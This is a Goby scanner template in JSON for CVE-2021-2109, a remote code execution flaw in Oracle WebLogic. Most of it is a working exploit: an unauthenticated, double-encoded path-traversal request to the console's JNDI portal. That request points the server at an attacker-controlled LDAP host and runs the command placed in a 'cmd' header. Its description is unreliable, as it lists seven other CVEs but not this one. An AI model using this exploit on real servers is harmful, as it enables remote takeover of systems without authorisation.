Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109.json

{
      "Name": "Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109",
      "Level": "3",
      "Tags": [
            "RCE"
      ],
      "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
      "Description": "2021年1月20日，绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU（Critical Patch Update），共修复了329个不同程度的漏洞，其中包括7个影响WebLogic的严重漏洞（CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756），未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8，利用复杂度低。建议用户尽快采取措施，对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
      "Product": "WebLogicd",
      "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
      "Author": "PeiQi",
      "Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
      "Recommandation": "",
      "References": [
            "http://wiki.peiqi.tech"
      ],
	  "HasExp": true,
	  "ExpParams": [
		{
			"name": "Cmd",
			"type": "input",
			"value": "whoami",
			"show": ""
		},
		{
			"name": "Ldap",
			"type": "input",
			"value": "ldap://xxx.xxx.xxx;xxx:1389",
			"show": ""
		}
		
	  ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
                        "follow_redirect": true,
                        "header": {},
                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "JNDI",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
	  "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
                        "follow_redirect": true,
                        "header": {
                              "cmd": "{{{Cmd}}}"
                        },
                        "data_type": "text",
                        "data": ""
                  },
				  "SetVariable": [
					"output|lastbody"
				  ]
            }
      ],
      "PostTime": "2021-01-22 13:55:45",
      "GobyVersion": "1.8.237"
}